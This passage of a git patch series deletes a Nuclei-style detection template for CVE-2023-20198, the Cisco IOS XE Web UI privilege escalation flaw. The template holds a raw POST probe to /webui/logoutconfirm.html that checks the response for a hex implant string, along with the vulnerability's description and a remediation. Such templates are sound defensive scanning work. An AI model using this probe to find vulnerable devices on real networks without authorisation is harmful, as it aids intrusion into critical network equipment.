- remediation: "Disable the HTTP server feature on internet-facing systems by running one of the following commands in global configuration mode: `no ip http server` or `no ip http secure-server`"
- reference:
- - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
- - https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-ios-xe-zero-day-actively-exploited-in-attacks/
- - https://socradar.io/cisco-warns-of-exploitation-of-a-maximum-severity-zero-day-vulnerability-in-ios-xe-cve-2023-20198/
- tags: cve,cve2023,cisco
-
-requests:
- - raw:
- - |+
- POST /webui/logoutconfirm.html?logon_hash=1 HTTP/1.1
- Host: {{Hostname}}
-
- matchers:
- - type: regex
- part: body
- regex:
- - '[0-9a-fA-F]+'
\ No newline at end of file
From 06bff400c6561b784f7f07aa18179c0d71309b07 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 3 Nov 2023 17:34:17 +0530
Subject: [PATCH 15/15] Delete http/cves/CVE-2023-20198.yaml
---
http/cves/CVE-2023-20198.yaml | 25 -------------------------
1 file changed, 25 deletions(-)
delete mode 100644 http/cves/CVE-2023-20198.yaml
diff --git a/http/cves/CVE-2023-20198.yaml b/http/cves/CVE-2023-20198.yaml
deleted file mode 100644
index d5a5e03197a..00000000000
--- a/http/cves/CVE-2023-20198.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2023-20198
-info:
- name: Cisco IOS XE Privilege Esculation detection
- author: E1A & rxerium
- severity: critical
- description: |
- A vulnerability in the Web User Interface (Web UI) of Cisco IOS XE software allows an attacker to create an account on the affected device with privilege level 15 access, effectively granting them full control of the compromised device and allowing possible subsequent unauthorized activity.
- remediation: "Disable the HTTP server feature on internet-facing systems by running one of the following commands in global configuration mode: `no ip http server` or `no ip http secure-server`"
- reference:
- - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
- - https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-ios-xe-zero-day-actively-exploited-in-attacks/
- - https://socradar.io/cisco-warns-of-exploitation-of-a-maximum-severity-zero-day-vulnerability-in-ios-xe-cve-2023-20198/
- tags: cve,cve2023,cisco
-
-requests:
- - raw:
- - |+
- POST /webui/logoutconfirm.html?logon_hash=1 HTTP/1.1
- Host: {{Hostname}}
-
- matchers:
- - type: regex
- part: body
- regex:
- - '[0-9a-fA-F]+'